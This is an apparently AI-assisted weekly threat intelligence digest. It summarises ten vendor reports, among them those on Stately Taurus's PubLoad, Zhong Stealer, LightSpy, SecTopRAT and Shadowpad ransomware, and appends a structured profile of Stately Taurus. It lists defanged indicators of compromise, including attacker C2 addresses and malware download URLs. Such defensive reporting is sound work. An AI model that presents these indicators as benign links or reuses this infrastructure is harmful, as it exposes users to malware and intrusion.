Full Report
This is a weekly threat intelligence report review from RST Cloud. This week, we analysed 50 threat intelligence reports and prepared a concise summary of these reports, including pertinent metadata that was extracted. You can find below a short summary of 10 reports, related threats, tools, threat actors, a link to the source, and a number of extracted indicators of compromise (IoCs) from the original reports. More granular information, including TTPs, on all reports is available via RST Report Hub.Title: Stately Taurus Activity in Southeast Asia Links to Bookworm MalwareLink: https://unit42.paloaltonetworks.com/stately-taurus-uses-bookworm-malware/Summary: Recent investigations have revealed a comprehensive cyber threat posed by the Stately Taurus group, targeting organizations in Southeast Asia using a malware family known as PubLoad. This stager malware employs DLL sideloading techniques to execute malicious payloads, notably BrMod104.dll, while communicating with a command and control (C2) server through disguised HTTP requests mimicking legitimate Windows updates. Additionally, the research indicates a connection between PubLoad and the Bookworm malware framework, with both exhibiting similarities in execution and C2 communications, suggesting a refined and adaptive approach by Stately Taurus. The historical analysis ties the group to past, previously unattributed attacks against governmental organizations, showcasing the persistence and evolution of their tactics and tools.Threats: red_delta_group bookworm dll_sideloading_technique toneshell proxyshell_vuln proxylogon_exploit pubload lazarus_groupIndicators of compromise:-------------------------ip: 123[.]253[.]32[.]15, 103[.]27[.]202[.]80, 103[.]27[.]202[.]68, 103[.]27[.]202[.]87, 123[.]253[.]35[.]231domain: www[.]fjke5oe[.]com, update[.]fjke5oe[.]com, www[.]uvfr4ep[.]com, www[.]hbsanews[.]com, www[.]i5y3dl[.]com, www[.]b8pjmgd6[.]com, www[.]zimbra[.]page, www[.]ggrdl4[.]com, www[.]gm4rys[.]comurl: http://download[.]microsoft[.]com/v11/2/windowsupdate/redir/v6-win7sp1-wuredir[.]cabhash: - sha256=2a00d95b658e11ca71a8de532999dd33ddee7f80432653427eaa885b611ddd87, - sha256=b382cc85eee95a620fc11370309ff76de9a3bcaefb645790434d8251a3b9fce1, - sha256=a08e0d1839b86d0d56a52d07123719211a3c3d43a6aa05aa34531a72ed1207dc, - sha256=ab9d8f1021f2a99c74aa66f8ddb52996ac2337da9de2676d090b87e19ce93033, - sha256=243b92959cd9aa03482f3398fbe81b4874c50a5945fe6b0c0abb432a33db853f, - sha256=a0887fa90f88dd002b025a97b3a57e4fdb7f5fdd725490d96776f8626f528ef2, - sha256=a2452456eb3a1a51116d9c2991aae3b0982acc1a9b30efee92a4f102dc4d2927, - sha256=3e137da41cb509412ee230c6d7aac3d69361358b28c3a09ec851d3c0f3853326, - sha256=fdad627a21a95ea2a6136c264c6a6cc2f0910a24881118b6eabc2d6509dc8dd7, - sha256=ab54af1dbe6a82488db161a7f57cd74f2dd282a9522587f18313b4e9835dc558, - sha256=3cef0b5f069cc1d15d36aa83d54d2a7be79b29b02081b6592dd4714639ad0a66, - sha256=43de1831368e6420b90210e15f72cea9171478391e15efdd608ad22fe916cea8, - sha256=2bae8b07f5098e1ca8fb5a5776eb874072ace4e19734cba4af4450eeccde7f89, - sha256=a229a2943cf8d1b073574f0c050ca06392d0525b2028f4b4b04d1e4b40110c66, - sha256=9192a1c1ab42186a46e08b914d66253440af2d2be6b497c34fe4b1770c3b5e01, - sha256=4a92fa725adc57d7b501f33e87230a8291cf8ad22d4d3a830293abcc0ac10d12, - sha256=da8ef50fe5e571d0143a758c7c66bb55653f1f2d04f16464fc857226441d79b2, - sha256=f0df09513dcf292264b3336269952c7e9ff685df8180a2035bee9f3143b36609, - sha256=167a842b97d0434f20e0cd6cf73d07079255a743d26606b94fc785a0f3c6736e, - sha256=eb176117650d6a2d38ff435238c5e2a6d0f0bb2a9e24efed438a33d8a2e7a1ea, - sha256=cf61b7a9bdde2a39156d88f309f230a7d44e9feaf0359947e1f96e069eca4e86, - sha256=5064b2a8fcfc58c18f53773411f41824b7f6c2675c1d531ffa109dc4f842119b, - sha256=fbc67446daaa0a0264ed7a252ab42413d6a43c2e5ab43437c2b3272daec85e81, - sha256=f7b024196ac50bd0f7ed362a532e83edf154bb60fcf24d0ab5297d0c6beaca0f, - sha256=bbf12ee2cd71dbcf2948adf64f354ad7c69d6b6ff0b78ea76b3df2d02b08ed0f, - sha256=fa739724a4b6f7a766a2d7695d7da7b33a6ac834672c1b544dd555c93600a637, - sha256=d7dbfb2b755418842fea4fca5628f0b36bbd128a71ddcd858b4b3c67ba78f516, - sha256=6804b10aefe8fdb2b33ecf3bc5a93f49413ef66001b561e6fc121990d703d780, - sha256=72aa72a4a4bdb09146c587304c6639eae65900cb2ea26911540a77d1f9b7acf6, - sha256=fb25a69ffc18b79ee664462e0717cf5e70820948d5d2ca4c192fac8b1ede91c2, - sha256=dcc349a1b624f6b949f181a7dd859a82715b4d3b6c37c7e5be1b729cd8e6f01f, - sha256=51bf329ba04a042789bad3b395092488a3d89130dc72818985cde11fb85f8389, - sha256=b7e042d2accdf4a488c3cd46ccd95d6ad5b5a8be71b5d6d76b8046f17debaa18, - sha256=41276827827b95c9b5a9fbd198b7cff2aef6f90f2b2b3ea84fadb69c55efa171, - sha256=4fbfbf1cd2efaef1906f0bd2195281b77619b9948e829b4d53bf1f198ba81dc5, - sha256=4e8717c9812318f8775a94fc2bffcf050eacfbc30ea25d0d3dcfe61b37fe34bb, - sha256=98d6db9b86d713485eb376e156d9da585f7ac369816c4c6adb866d845ac9edc7, - sha256=a02766b3950dbb86a129384cf9060c11be551025a7f469e3811ea257a47907d5, - sha256=4b6f0ae4abc6b73a68d9ee5ad9c0293baa4e7e94539ea43c0973677c0ee7f8cbemail:Title: Zhong Stealer Analysis: New Malware Targeting Fintech and CryptocurrencyLink: https://any.run/cybersecurity-blog/zhong-stealer-malware-analysis/Summary: In December 2024, a phishing campaign targeting the cryptocurrency and fintech sectors was discovered, involving a new malware called Zhong Stealer. This malware initiates contact with a command-and-control server in Hong Kong and employs various tactics for data exfiltration, including querying a component inventory file and gathering system language settings to avoid unwanted regions. Zhong Stealer primarily aims to steal browser credentials from commonly used browsers, exfiltrating the data via non-standard port 1131 to evade detection, while also incorporating persistence techniques such as modifying Windows registry keys and creating scheduled tasks to maintain functionality across reboots. The campaign's effectiveness is further enhanced by social engineering tactics aimed at customer support teams.Threats: zhong_stealerIndicators of compromise:-------------------------ip: 156[.]245[.]23[.]188, 47[.]79[.]64[.]228domain: kkuu[.]oss-cn-hongkong[.]aliyuncs[.]comurl: https://kkuu[.]oss-cn-hongkong[.]aliyuncs[.]com/ss/TASLogin[.]log, https://kkuu[.]oss-cn-hongkong[.]aliyuncs[.]com/ss/TASLoginBase[.]dll, https://kkuu[.]oss-cn-hongkong[.]aliyuncs[.]com/ss/down[.]exe, https://kkuu[.]oss-cn-hongkong[.]aliyuncs[.]com/ss/uu[.]txthash: - sha256=1abffe97aafe9916b366da57458a78338598cab9742c2d9e03e4ad0ba11f29bf, - sha256=4eaebd93e23be3427d4c1349d64bef4b5fc455c93aebb9b5b752981e9266488e, - sha256=e46779869c6797b294cb097f47027a5c52466fd11112b6ccd52c569578d4b8cd, - sha1=ce120e922ed4156dbd07de8335c5a632974ec527, md5=778b6521dd2b07d7db0eaeaab9a2f86b, sha256=02244934046333f45bc22abe6185e6ddda033342836062afb681a583aa7d827femail: zhongmaziil992@outlook[.]comTitle: Signals of Trouble: Multiple Russia-Aligned Threat Actors Actively Targeting Signal MessengerLink: https://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger/Summary: The Google Threat Intelligence Group (GTIG) has identified a rise in Russian state-aligned threat actors targeting Signal Messenger accounts, particularly those associated with military personnel, politicians, journalists, and activists, amid ongoing military actions in Ukraine. This threat involves the misuse of Signal's "linked devices" feature through the distribution of malicious QR codes that connect victims' accounts to adversary-controlled instances, allowing eavesdropping on sensitive conversations. Two specific Russian threat actor clusters, UNC5792 and UNC4221, have been implicated in these operations, utilizing phishing tactics and tailored credentials to compromise military-related communications. Additionally, established threat actors, including APT44, Sandworm, and Turla, have leveraged various methods, such as scripts and malware, to extract Signal messages from compromised devices, highlighting a broader trend of increasing threats to secure messaging platforms within conflict zones.Threats: sandworm_group unc5792_group uac-0195_group unc4221_group wavesign rclone_tool chisel_tool turla_group ghostwriter_group robocopy_tool seaborgium_groupIndicators of compromise:-------------------------ip: 150[.]107[.]31[.]194:18000domain: signal-groups[.]tech, signal-confirm[.]site, teneta[.]add-group[.]site, signal-protect[.]host, add-signal-group[.]com, add-signal-groups[.]com, group-signal[.]com, groups-signal[.]site, signal-device-off[.]online, signal-group-add[.]com, signal-group[.]com, signal-group[.]site, signal-group[.]tech, signal-groups-add[.]com, signal-groups[.]site, signal-security[.]online, signal-security[.]site, signalgroup[.]site, signals-group[.]com, confirm-signal[.]site, teneta[.]join-group[.]online, group-teneta[.]online, helperanalytics[.]ru, teneta[.]group, group[.]kropyva[.]siteurl: hash: - md5=e078778b62796bab2d7ab2b04d6b01bf, - md5=a97a28276e4f88134561d938f60db495, - md5=b379d8f583112cad3cf60f95ab3a67fd, - md5=b27ff24870d93d651ee1d8e06276fa98email:Title: Trimble Cityworks: CVE-2025–0994Link: https://www.recordedfuture.com/blog/trimble-cityworks-cve-2025-0994-vulnerability-analysisSummary: CVE-2025-0994 is a deserialization vulnerability in Trimble Cityworks, which can be exploited by authenticated attackers to achieve remote code execution on targeted Microsoft IIS web servers, posing risks to critical infrastructure services like water management and energy distribution. Attackers are utilizing advanced techniques such as custom Rust-based loaders to deploy malicious payloads, including VShell and Cobalt Strike, along with obfuscated JavaScript and executables with randomized names. The Indicators of Compromise (IoCs) provided by Trimble highlight specific IP addresses linked to Cobalt Strike command-and-control servers, revealing the sophistication of the attacks and the potential for significant disruption in essential services.Threats: cobalt_strike vshell putty_toolIndicators of compromise:-------------------------ip: 192[.]210[.]239[.]172:3219, 192[.]210[.]239[.]172:4219, 23[.]247[.]136[.]238, 31[.]59[.]70[.]13, 31[.]59[.]70[.]11, 149[.]112[.]117[.]49, 192[.]210[.]137[.]81, 192[.]210[.]183[.]118domain: cdn[.]phototagx[.]com, ifode[.]xyzurl: https://cdn[.]lgaircon[.]xyz:443/jquery-3[.]3[.]1[.]min[.]js, https://192[.]210[.]239[.]172/messages/73KWf-o0-s0hxVCDJp1sfAHRcgdm7hash: - sha256=4b7561e27c87a1895446d7f2b83e2d9fcf71e6d6e8bc99d44818dc39a6ff99d5, - sha256=4ffc33bdc8527a2e8cb87e49cdc16c3b1480dfc135e507d552f581a67d1850a9, - sha256=8a6c735f3608719ec9f46d9c6c5fc196db8c97065957c218b98733a491edd899, - sha256=883d849b94238c26c57c0595ccb95b8c356628887b9a3628bf56e726332af925, - sha256=151a71c43e63db802d41d5d715aa98eb1b236e0a6441076a8d30fd93990416b4, - sha256=1de72c03927bcd2810ce98205ff871ef1ebf4344fba187e126e50caa1e43250b, - sha256=14a072113baa0a1e1e2b6044068c7bc972ae5e541a0aec06577b0d6663140079, - sha256=04dc3a16e1e2b4924943805a1cea5e402c4f2304c717ea21fdf43274b8c34a84, - sha256=f09b51b759dfe7de06fa724bd89592f5b8eae57053d5fb4891e40f24055103fbemail:Title: LightSpy Expands Command List to Include Social Media PlatformsLink: https://hunt.io/blog/lightspy-malware-targets-facebook-instagramSummary: LightSpy is a sophisticated malware first identified in 2020, capable of targeting multiple platforms including mobile devices, Windows, macOS, Linux, and routers. It employs watering hole tactics and exploit-based delivery methods, exhibiting persistence by frequently modifying its infrastructure to avoid detection. Recent findings indicate that LightSpy has significantly expanded its command functionality to over 100 commands, shifting its focus from messaging apps to extracting data from social media platforms like Facebook and Instagram, enabling the collection of private messages, contact lists, and account metadata. Investigations into its associated servers have revealed active IP addresses that point to its operational complexity, particularly focusing on Windows and iOS systems while highlighting ongoing developments in the malware's capabilities for enhanced data collection and system surveillance.Threats: lightspy watering_hole_technique deepdataIndicators of compromise:-------------------------ip: 43[.]248[.]8[.]76, 149[.]104[.]18[.]80, 45[.]125[.]34[.]126:49000, 149[.]104[.]18[.]80:10000, 45[.]125[.]34[.]126, 103[.]238[.]227[.]138, 43[.]248[.]8[.]108, 149[.]104[.]18[.]251, 43[.]248[.]136[.]104:50000, 149[.]104[.]18[.]80:30000, 149[.]104[.]18[.]80:40002, 45[.]248[.]8[.]108:10002, 43[.]248[.]8[.]108:20002, 45[.]155[.]220[.]79:51200, 45[.]155[.]220[.]79:55501, 149[.]104[.]18[.]251:10000, 149[.]104[.]18[.]251:20000, 45[.]125[.]34[.]126:51200, 45[.]125[.]34[.]126:53501, 45[.]155[.]220[.]194:51200, 45[.]155[.]220[.]194:53501, 43[.]248[.]8[.]76:10002, 43[.]248[.]8[.]76:20002domain: hk[.]cdn[.]caturl: http://149[.]104[.]18[.]80:30000/963852741/ios/version[.]json, https://45[.]125[.]34[.]126:49000/ujmfanncy76211/front_api/cmd_list, https://149[.]104[.]18[.]80:10000/ujmfanncy76211/front_api/cmd_list, https://149[.]104[.]18[.]80:40002/963852741/ios/version[.]json, https://149[.]104[.]18[.]80:30000/963852741/ios/plugins/manifest[.]json, https://149[.]104[.]18[.]80:10000/963852741/loginhash: - md5=81d2bd4781e3753b508ff6d966dbf160, - sha256=890712c46e6629a59d1d82840256530f1cd3f1eda5c1e7f7f459ca786e120ba7, - sha256=9e4e2c92037f43441376685af7f30c6df602ed9706715073e696a6a178a4b5d7, - sha256=bd6ec04d41a5da66d23533e586c939eece483e9b105bd378053e6073df50ba99, - sha256=9da5c381c28e0b2c0c0ff9a6ffcd9208f060537c3b6c1a086abe2903e85f6fdd, - sha256=f05b8387f808a598338ce2258014b2c259a4297a5593779e46029b3c5539ea4e, - sha256=98a5275997acab23c26165980f221eaf2aab90b779af162c06e8823b4d19c7a3, - sha256=72eff7f7f928f54db67d9b3aeee9a6c2b0af89edc0a71ce09715489ac7644a68, - sha256=250e2aefc5a31019da9afeb22b1c704c6fd4db2da1ff6b5a0be4c63d23a32090, - sha256=10c43f9dfaf94777f89248720555d17ac275b21ca726291989672b34f3991bc3, - sha256=2e86456358046e347e05dce6ef6e30af92560901c145b95329fecaf6e64bd898, - sha256=1d9293814fa3ce62fa67c1cbb8661660ffe1caa848142ba7f58dbbb60bc491ba, - sha256=7147672b45832714c8b3d075665345d0860e9ebb672c4b5cbbe17243270ca41d, - sha256=7dbc26526fa32e1c91767d8b18abd3f4367f1b55b0f9ccf338fe5b9f74a36e48, - sha256=e7b9e5e3bd6f72c39ef687ae59b2380815e827ea479ad142f278f295d706c5ec, - sha256=29e090acf7aa1296fa5d22b0df92a830e7a58467f966dd0f78bd1560dc0bad45, - sha256=74ce9f196c930c50811e4640283779ddd971e6a5ad6771c0577a80147c12bd35, - sha256=aee8ca6bcfff02ae0f931b76f48e39576477af289385cbcde27d3ac3e7fae35e, - sha256=0258edc8c3efe8b3d8ccfce790c9192994e54a81dded1c0e116093d638506a01email:Title: SecTopRAT bundled in Chrome installer distributed via Google AdsLink: https://www.malwarebytes.com/blog/cybercrime/2025/02/sectoprat-bundled-in-chrome-installer-distributed-via-google-adsSummary: A cyber threat has been identified where cybercriminals exploit Google Ads to distribute malware via a counterfeit Google Chrome installer. Users searching for Chrome are misled to a deceptive intermediary page on Google Sites, which provides a malicious executable that connects to a server to receive additional instructions. Upon execution, the malware, identified as SecTopRAT, creates exclusions for detection software and masquerades as a legitimate browser, while secretly injecting malicious code into a system process and establishing a connection with the attackers' command and control server. This incident underscores the vulnerabilities within the software delivery chain and the risks posed by the manipulation of trusted platforms, illustrating the ongoing challenges in combating such sophisticated cybercriminal tactics.Threats: sectop_ratIndicators of compromise:-------------------------ip: 45[.]141[.]84[.]208domain: chrome[.]browser[.]com[.]de, launchapps[.]siteurl: https://launchapps[.]site/getCode[.]php, https://launchapps[.]site/3[.]php?uuid=- _uuid, https://sites[.]google[.]com/view/gfbtechd, https://chrome[.]browser[.]com[.]de/GoogleChrome[.]exehash: - sha256=48fdfbe23eef7eddff071d3eda1bc654b94cf86036ca1cca9c73b0175e168a55, - sha256=0f9b2870c4be5ebacb936000ff41f8075ec88d6535161a93df8e6cfea2d8db54email:Title: Weak Passwords Led to (SafePay) RansomwareYet AgainLink: https://www.nccgroup.com/us/research-blog/weak-passwords-led-to-safepay-ransomware-yet-again/Summary: The SafePay ransomware incident, investigated by NCC Group's Digital Forensics and Incident Response team, involved threat actors exploiting vulnerabilities through a misconfigured Fortigate firewall that bypassed multi-factor authentication. The attackers authenticated as domain administrators using weak passwords, and employed sophisticated techniques, including the deployment of a backdoor named soc.dll packed with Upx, to maintain persistent access to the compromised systems. They executed a ransomware binary (1.exe) that utilized the ChaCha20 encryption algorithm, encrypted files with a .safepay extension, disabled recovery mechanisms, and specifically avoided execution in Russian-speaking regions. The attack's impact extended to encrypting hypervisors, affecting virtual machines, and although comparisons to other ransomware revealed low similarities, it remains unclear if it is a new variant or a rewritten strain aimed at evading detection.Threats: safepay screenconnect_tool qdoor upx_tool runpe_tool process_hollowing_technique blacksuit_ransomware credential_dumping_technique shadow_copies_delete_techniqueIndicators of compromise:-------------------------ip: 88[.]119[.]167[.]239domain: url: http://nj5qix45sxnl4h4og6hcgwengg2oqloj3c2rhc6dpwiofx3jbivcs6qd[.]onionhash: - sha256=6c1d36df94ebe367823e73ba33cfb4f40756a5e8ee1e30e8f0ae55d47e220a6a, - sha1=07353237350c35d6dc2c8f143b649cd07c71f62b, sha256=e79608cf1d6b51324c14bef8883054c1238ed5f080222cc464810e6e14adc346, - sha256=921df888aaabcd828a3723f4c9f5fe8b8379c6b7067d16b2ea10152300417eaeemail: colinsolomon@protonmail[.]com, depaolakristabelle@protonmail[.]comTitle: Demystifying PKT and Monero Cryptocurrency deployed on MSSQL serversLink: https://www.seqrite.com/blog/pkt-monero-mining-mssql-malware/Summary: Recent observations by Seqrite Lab have identified a rising trend in cyber threats linked to cryptocurrency mining, specifically involving PKT Classic and Monero. Attackers have been exploiting vulnerabilities in SQL Server systems to deploy mining operations without user consent, using the legitimate “certutil†utility to download the PacketCrypt mining tool and executing mining scripts via PowerShell. The mining process is resource-intensive, with some instances of the "pkt.exe" process consuming up to 99% of CPU resources, adversely affecting system performance. The analysis revealed that the mining tools were created using RUST and publicly shared through a GitHub repository associated with the PKT cash blockchain founder, showcasing a multistage attack utilizing available resources while targeting both PKT Classic and Monero.Threats: packet_crypt_tool quickheal lolbin_technique xmrig_miner themida_tool ghanaravaIndicators of compromise:-------------------------ip: 188[.]81[.]134[.]196domain: url: http://188[.]81[.]134[.]196/resources/img/pktw[.]png, http://188[.]81[.]134[.]196/resources/js/info2R[.]txt, http://188[.]81[.]134[.]196/resources/js/infoALT[.]txthash: - sha256=e3d0c31608917c0d7184c220d2510848f6267952c38f86926b15fb53d07bd562, - sha256=a5ca1e64278543dd9c0423d6e183efaaac1167fc0210da7eea9bf7a1b0246be8, - sha256=9398d7a723e2ba4bb8046c8a6b796d9fc13c530a355d6319a53437e556071f39, - sha256=5369b61daacbb811f1da996b5e61a70719d43175f447ceaa9b9023b875fe70bc, - sha256=250743f1af4b5a9dd18028f792a0432a43d6bf17b50aad75b9d3a0c83786940d, - sha256=b1d169f6904ac5af690243e6d0b042a64089251114a630a740c87208ead52503email:Title: Angry Likho: Old beasts in a new forestLink: https://securelist.com/angry-likho-apt-attacks-with-lumma-stealer/115663/Summary: Angry Likho, also known as Sticky Werewolf, is an advanced persistent threat (APT) group observed since 2023 and linked with the Awaken Likho group, targeting employees of major organizations and government agencies in Russia and Belarus. The attackers utilize spear-phishing techniques, often sending emails with malicious attachments disguised as videoconference invitations; one attack involved a malicious RAR archive containing LNK files. Key malware identified includes FrameworkSurvivor.exe, which runs a compiled AU3 script for stealthy execution and injects the Lumma Trojan, capable of stealing sensitive information from various web browsers and cryptocurrency wallets. As of January 2025, Angry Likho has shown a resurgence in activity, employing similar techniques and targeting hundreds of victims across Russian firms, with evidence supporting their consistent operational methods.Threats: sticky_werewolf_group core_werewolf_group spear-phishing_technique Trojan.Win32.Generic lumma_stealer anydesk_toolIndicators of compromise:-------------------------ip: domain: averageorganicfallfaw[.]shop, distincttangyflippan[.]shop, macabrecondfucews[.]shop, greentastellesqwm[.]shop, stickyyummyskiwffe[.]shop, sturdyregularrmsnhw[.]shop, lamentablegapingkwaq[.]shop, innerverdanytiresw[.]shop, standingcomperewhitwo[.]shop, uniedpureevenywjk[.]shop, spotlessimminentys[.]shop, specialadventurousw[.]shop, stronggemateraislw[.]shop, willingyhollowsk[.]shop, handsomelydicrwop[.]shop, softcallousdmykw[.]shop, testdomain123123[.]shopurl: https://testdomain123123[.]shop/FrameworkSurvivor[.]exehash: - md5=f8df6cf748cc3cf7c05ab18e798b3e91, - md5=ef8c77dc451f6c783d2c4ddb726de111, - md5=de26f488328ea0436199c5f728ecd82a, - md5=d4b75a8318befdb1474328a92f0fc79d, - md5=ba40c097e9d06130f366b86deb4a8124, - md5=b0844bb9a6b026569f9baf26a40c36f3, - md5=89052678dc147a01f3db76febf8441e4, - md5=842f8064a81eb5fc8828580a08d9b044, - md5=7c527c6607cc1bfa55ac0203bf395939, - md5=75fd9018433f5cbd2a4422d1f09b224e, - md5=729c24cc6a49fb635601eb88824aa276, - md5=69f6dcdb3d87392f300e9052de99d7ce, - md5=5e17d1a077f86f7ae4895a312176eba6, - md5=373ebf513d0838e1b8c3ce2028c3e673, - md5=351260c2873645e314a889170c7a7750, - md5=23ce22596f1c7d6db171753c1d2612fe, - md5=0c03efd969f6d9e6517c300f8fd92921, - md5=277acb857f1587221fc752f19be27187, - md5=faa47ecbcc846bf182e4ecf3f190a9f4, - md5=d8c6199b414bdf298b6a774e60515ba5, - md5=9d3337f0e95ece531909e4c8d9f1cc55, - md5=6bd84dfb987f9c40098d12e3959994bc, - md5=6396908315d9147de3dff98ab1ee4cbe, - md5=1e210fcc47eda459998c9a74c30f394e, - md5=fe0438938eef75e090a38d8b17687357, - md5=e0f8d7ec2be638fbf3ddf8077e775b2d, - md5=cdd4cfac3ffe891eac5fb913076c4c40, - md5=b57b13e9883bbee7712e52616883d437, - md5=a3f4e422aecd0547692d172000e4b9b9, - md5=9871272af8b06b484f0529c10350a910, - md5=97b19d9709ed3b849d7628e2c31cdfc4, - md5=8e960334c786280e962db6475e0473ab, - md5=76e7cbab1955faa81ba0dda824ebb31d, - md5=7140dbd0ca6ef09c74188a41389b0799, - md5=5c3394e37c3d1208e499abe56e4ec7eb, - md5=47765d12f259325af8acda48b1cbad48, - md5=32da6c4a44973a5847c4a969950fa4c4email:Title: Updated Shadowpad Malware Leads to Ransomware DeploymentLink: https://www.trendmicro.com/en_us/research/25/b/updated-shadowpad-malware-leads-to-ransomware-deployment.htmlSummary: Shadowpad, a modular malware family linked to the Chinese threat actor APT41 since its identification in 2017, has recently been repurposed to deploy a new, undetected ransomware strain. Exploiting weak passwords and bypassing multi-factor authentication, attackers gained remote network access to 21 targeted companies across various regions, utilizing administrative accounts with poor credentials. Investigations showed that attackers installed Shadowpad within the victims' networks, previously focusing on espionage but now transitioning to ransomware deployment, which features AES and RSA encryption. The malware showcases advanced capabilities such as keylogging and file retrieval, employs encrypted payloads, and uses DNS over HTTPS to evade detection. Furthermore, the operational methods suggest intelligence-gathering objectives, particularly targeting intellectual property in the manufacturing sector, while a tenuous connection to the Teleboyi threat actor was identified through similar decryption techniques.Threats: shadowpad winnti_group supply_chain_technique axiom_group earth_lusca_group dll_sideloading_technique antidebugging_technique evilextractor kodex cqhashdump_tool impacket_tool wmiexec_tool ntdsutil_tool teleboyi_group plugx_ratIndicators of compromise:-------------------------ip: 108[.]61[.]163[.]91domain: updata[.]dsqurey[.]com, bcs[.]dsqurey[.]com, dsqurey[.]com, dscriy[.]chtq[.]net, sery[.]brushupdata[.]com, time[.]dsqurey[.]com, system[.]chtq[.]net, updata[.]chtq[.]net, network[.]oossafe[.]com, notes[.]oossafe[.]com, caba[.]superdasqe[.]me, ccs[.]superdasqe[.]me, czs[.]superdasqe[.]me, kzb[.]superdasqe[.]meurl: hash: - sha256=f50de0fae860a5fd780d953a8af07450661458646293bfd0fed81a1ff9eb4498, - sha256=8d44f2f442ca8f2fbbf75086a6f8d518c300ca93fe9957a9716076919b475865, - sha256=83c1a668ab06f55e6879593ca24eed9f78832be97ac90bb74ef5828067f2d900, - sha256=c19be7a006bd2ba8deb56dcc6127a76f9624c6f1392a1794870dbed6f1a81bd5, - sha256=c4db25ab55af2e943a297a5ecf7a62acc3ad8897ec8ba4ab3226a138da237b82, - sha256=28e6362ecf033b2a26c7457dcbd7ad2ab34e253fb08666d39073391a1254ea41, - sha256=7416f6b69b34b3a36a86e50808e1dc47f4dc665bfd6f394cef65e0ba5eaf961b, - sha256=bc490047fe6e0b0000c6cd147d3cf483105c92cf00450bfe35ac70f276a9e5c8, - sha256=c5f8a256d0969e253633160b9728b6c2bc044f536e92af178a05a598aaa09c1f, - sha256=a2bb321d41b2300e80f9400950fa2125470d5b3927933ab4d6397f0cbf81532a, - sha256=d74b6b2129936377aaccc619bcfd4df4ffbe2f35f960a4b043b23ae78a31ec35, - sha256=366ea3377eaefa28b655b530710c03fb2ace67bb531b1820e916cb02023892ba, - sha256=f8915c5be0649642dac22572355f1462972f5087471f66f6a243f2374b208eb8, - sha256=b38dab1ee402f731313d697d5d79372ae97fcab5704077771b5b82e705e0cd6d, - sha256=625ed0e0ad7d3fbf2738349c767a7990c9f0d388de66104e11df3e0c4632033c, - sha256=431a630983cd327fc70ea49b3a5497a179dbde19d8f13d2cfceef4e47613024b, - sha256=e1d72b0cfc3342b8a6436e3047c3cc54246c346ac179e459d07620d192ba6e01, - sha256=fa7f2ddf91980d639a87465bd2a38eaa44d6079b11ace3b2b3dff03caed66de5, - sha256=b28bc39e569aa0cfe984c341830cb037c5305877ba22a940c3bdaeb43ca87878, - sha256=571607c7f55c3616e4c58db15e3d55317da10294dbc10e0cd1ed24879b8fc051, - sha256=bc5b2ef81593095696433877cccb0ab75ef942258ef4795de5538df842d952f4, - sha256=fa3a3351cd55089d40a7311e4bfaf15e4247416f78383d94ad58809467429b3e, - sha256=2df4c7bfa608ca88d9d659358894226910850ac0d7e566c6c10ec2727361d47b, - sha256=b66660dfe1ce69f706aaa412fcd3ff18554d604df59c09adc2a8117417967ce9, - sha256=7b8ea6b1e2a29190cb28fc98ef837bf4a7a0b71b84177ce9395a5113a843c4d3, - sha256=de4bb30e400f081601d4091206ba6c04ac502f50e0dbac879db8c0202bff8108, - sha256=5dc36e687a7fa3cfbf845e8a53173f37ac38559b6b87f9dcf609a72b3f284035, - sha256=37039a761114251f4556e4fe41c3ec01b7206a483c4698ffe5a0f1617a8bc26b, - sha256=fcb8bf42d852526214578ab4b477b29f2412a7a931c6353db4fa6c221661edf4, - sha256=ceac8b67f19d596b2c2f34d682f88c717d11dd4c1144e2e7439b6bb78adb1736, - sha256=9df4624f815d9b04d31d9b156f7debfd450718336eb0b75100d02cb45d47bd9a, - sha256=28d78e52420906794e4059a603fa9f22d5d6e4479d91e9046a97318c83998679, - sha256=41128b82fa12379034b3c42bdecf8e3b435089f19a5d57726a2a784c25e9d91f, - sha256=c8268641aecad7bd32d20432da49bb8bfc9fe7391b92b5b06352e7f4c93bc19e, - sha256=e06710652fa3c8b45fd0fece3b59e7614ad59a9bc0c570f4721aee3293ecd2d1, - sha256=f4e8841a14aa38352692340729c3ed6909d7521dd777518f12b8bd2d15ea00c5, - sha256=aa1233393dded792b74e334c50849c477c4b86838b32ef45d6ab0dc36b4511e3email:This article was generated with the assistance of an artificial intelligence language model, ChatGPT.
Analysis Summary
# Threat Actor: Stately Taurus
## Attribution & Identity
The threat actor is identified as the **Stately Taurus** group.
**Associated Groups/Threats Mentioned:** The report links Stately Taurus activity to the **Bookworm** malware framework. Other threats listed in the general report context include `red_delta_group` and `lazarus_group`, although a direct attribution to Stately Taurus is not specified for those.
## Activity Summary
Recent investigations show Stately Taurus actively targeting organizations in **Southeast Asia**. They utilize a stager malware called **PubLoad** which deploys payloads like **BrMod104.dll**. The group has historical links to previously unattributed attacks against governmental organizations.
## Tactics, Techniques & Procedures
- **DLL Sideloading:** Used by the PubLoad stager malware to execute malicious payloads.
- **C2 Communication:** Communicates via disguised **HTTP requests mimicking legitimate Windows updates**.
- **Malware Linkage:** Exhibits similarities in execution and C2 communications with the **Bookworm** malware framework.
## Targeting
- **Sectors:** Not explicitly detailed, but historical targets include **governmental organizations**.
- **Geography:** **Southeast Asia**.
- **Victims:** No specific organizations are named, though the targeting scope includes organizations broadly within the region.
## Tools & Infrastructure
- **Malware families used:**
- **PubLoad** (Stager malware)
- **BrMod104.dll** (Payload)
- **Bookworm** (Associated framework)
- **Infrastructure (C2, domains, IPs):**
- **IPs (Defanged):** 123\[.\]253\[.\]32\[.\]15, 103\[.\]27\[.\]202\[.\]80, 103\[.\]27\[.\]202\[.\]68, 103\[.\]27\[.\]202\[.\]87, 123\[.\]253\[.\]35\[.\]231
- **Domains (Defanged):** www\[.\]fjke5oe\[.\]com, update\[.\]fjke5oe\[.\]com, www\[.\]uvfr4ep\[.\]com, www\[.\]hbsanews\[.\]com, www\[.\]i5y3dl\[.\]com, www\[.\]b8pjmgd6\[.\]com, www\[.\]zimbra\[.\]page, www\[.\]ggrdl4\[.\]com, www\[.\]gm4rys\[.\]com
- **URL (Defanged):** http://download\[.\]microsoft\[.\]com/v11/2/windowsupdate/redir/v6-win7sp1-wuredir\[.\]cab
## Implications
Stately Taurus demonstrates persistence and an adaptive approach, refining its tooling (PubLoad and C2 techniques) based on previous operations. Their confirmed targeting of governmental entities suggests a continued focus on high-value, politically sensitive targets in the Southeast Asian region.
## Mitigations
- Implement robust network monitoring capable of detecting anomalous C2 communications disguised as legitimate Windows update traffic.
- Harden systems against DLL sideloading attacks.
- Maintain up-to-date threat intelligence regarding the PubLoad and Bookworm malware variants.